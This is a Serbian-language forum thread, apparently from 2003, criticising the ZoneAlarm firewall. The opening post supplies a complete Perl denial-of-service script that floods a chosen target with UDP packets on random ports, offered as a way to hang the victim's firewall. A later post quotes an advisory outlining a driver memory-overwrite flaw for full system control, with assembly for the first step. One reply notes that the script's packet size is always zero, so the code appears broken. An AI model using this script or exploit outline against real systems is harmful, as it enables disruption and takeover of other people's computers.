Ne bi trebalo da koristite Firewall "Zone alarm"

1

Ne bi trebalo da koristite Firewall "Zone alarm"

offline
  • Pridružio: 18 Apr 2003
  • Poruke: 342

nemoj da instalirate Zone Alarm, svi ga hvale al iipak mnogo je busan...
evo na prier ova skripta ga blokira za citavo vreme dok tu osobu za zone alarmom pingujete, inace radi na svim windowsi, ZA4.0 pro itd...
Osim ovog "ZoneAlarm remote Denial Of Service exploita" postoji jos par ali i ovaj vam je dovoljan da se manete toga, ja vam ponovo preporucujem outpost! http://www.agnitum.com/download


#!/usr/bin/perl
use Socket;

system(clear);
print "\n";
print "--- ZoneAlarm Remote DoS Xploit\n Bre";
print "---\n";
print "--- Discovered & Coded By _6mO_HaCk\n";
print "\n";
if(!defined($ARGV[0]))
{
&usage
}

my ($target);
$target=$ARGV[0];

my $ia = inet_aton($target) || die ("[-] Unable to resolve
$target");

socket(DoS, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$target");

print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) {
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
$port=int(rand 65000) +1;
send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
offline
  • Pridružio: 17 Apr 2003
  • Poruke: 488
  • Gde živiš: Niš

Da li blokira sve verzije ZA?
Ma cim neki softver postane dovoljno rasprostranjen, nadje se neko da se pozabavi njegovim propustima... Same old story...
Zato nije lose imati 2 firewall-a...



offline
  • mire  Male
  • Elitni građanin
  • Pridružio: 18 Apr 2003
  • Poruke: 2282
  • Gde živiš: Beograd

ne znam da li shvatas da je $size nula posto $rand nije definisano

znaci on gomilu puta mnozi 0 x 0 x 0 i rez. je naravno 0

znaci paket nema size ...

kako to uopste radi Wink

offline
  • Vlada
  • Pridružio: 20 Apr 2003
  • Poruke: 3360
  • Gde živiš: Beograd

I da li uopste radi ?! Smile

offline
  • Pridružio: 18 Apr 2003
  • Poruke: 342

ZoneAlarm is a personal firewall and threat detection/prevention tool developed by Zone Labs for Windows operating systems. ZoneAlarm is vulnerable to a denial of service attack. By sending a flood of UDP packets to multiple ports, a remote attacker can cause the vulnerable device to hang until the attacker stops sending packets
Affected Systems:Windows Any versionZoneAlarm Pro Any version

--------------------------------
evo i linka da ne bi kopirao ovde pa se uverite....
http://archives.neohapsis.com/archives/bugtraq/2003-09/0021.html

offline
  • Pridružio: 18 Apr 2003
  • Poruke: 342

nije to samo jedan propust evo na primer jos i ovaj...

Local ZoneAlarm Firewall (probably all versions - tested on v3.1)
Device Driver vulnerability.
i to pomocu ovoga moci cete da imate punu kontrolu sistema!!!!
eto koliko nas cuva taj firewall!

i naravno sve o njemu....
I. BACKGROUND


ZoneAlarm is a very powerful and very common nowadays firewall for

Windows produced by Zone Labs. (http://www.zonelabs.com)




II. DESCRIPTION


The driver installed with ZoneAlarm is vulnerable, and can be
exploited in cause of that attacker can gain full system control
(ring0 privileges).


By sending properly formatted message to the ZoneAlarm Device
Driver (VSDATANT - TrueVector Device Driver) you can cause an
device driver memory overwrite.

Overview, sending faked buffors with specific singal can cause
a miscellaneous code execution:


First signal should be send to overwrite specific memory location,

in the current case it can be one of the case-if-statement.


push 0 ;overlapped
push offset bytes_returned ;bytes returned
push 4 ;lpOutBuffer size
push STATMENT_INSTRUCTION_POINTER ;memory to overwrite
push 0 ;lpInBuffer size
push 0 ;lpInBuffer
push 8400000fh ;guess what X-D
push vsdatant_handle ;device handle
call DeviceIoControl ;send it!



If the correct STATMENT_INSTRUCTION_POINTER will be put the address

should be overwritten to 00060001h (example). After memory
allocation at this address (inserting shellcode bla bla bla), the

second signal must be send to jump into inserted code. That can
be done with sending another signal:



LpInBuffer:
db STATMENT_OVERWRITTEN_NUMBER ;where to jump
db 7 dup (0) ;data?
dd temp_buff ;temp buffer
db 10 dup (0) ;some space


This one should be send with another dwIoControl code, however we

are no longer publishing any exploits, even PoC (die kiddies)


After sending second faked message, device driver will jump
to the STATEMENT offset which was overwritten by first "signal"



III. IMPACT


The after sucessfull exploitation, attacker can obtain FULL SYSTEM

CONTROL! In the worse for attacker option, OS can fault!

offline
  • offman  Male
  • Legendarni građanin
  • Pridružio: 13 Avg 2003
  • Poruke: 3525

Vec nebrojeno puta ponovljeno na ovom forumu AtGuard i stvar rijesena.

offline
  • Pridružio: 18 Apr 2003
  • Poruke: 342

at guard ne moze na ME, dobar je to ali star firewall vise niko ne radi na njemu, a nortona koji je ga je kupio nikad ne bi stavio...
zato koristim outpost...

offline
  • Vlada
  • Pridružio: 20 Apr 2003
  • Poruke: 3360
  • Gde živiš: Beograd

Mozda je star, ali stvarno radi sasvim OK ! Koristio sam i Zone Alarm, ali posto nije registrovan, dosta opcija nemogu da koristim. @Guard je free, i radi neke stvari koje Zone Alarm nema, npr. PopUp blocking!

offline
  • Pridružio: 04 Sep 2003
  • Poruke: 24135
  • Gde živiš: Wien

Zone Alarm ima PopUp blocking

Ko je trenutno na forumu
 

Ukupno su 1335 korisnika na forumu :: 46 registrovanih, 7 sakrivenih i 1282 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: -[CoA]-, A.R.Chafee.Jr., Apok, Asparagus, Atomski čoban, Bane san, bankulen, bojcistv, Boris90, comi_pfc, cvrle312, darcaud, darkangel, Dimitrise93, Dorcolac, dule10savic, Frunze, galijot, Georgius, gorantrojka, HogarStrashni, Ivan001, kokodakalo, Krvava Devetka, Kubovac, kybonacci, Lubica, LUDI, mackenzie, Metanoja, mile23, Mirage 2000N, Miškić, oldtimer, operniki, Panonsky, Parker, Srki94, Srle993, tmanda323, Tragač, virked, VJ, wolf1, zziko, Žrnov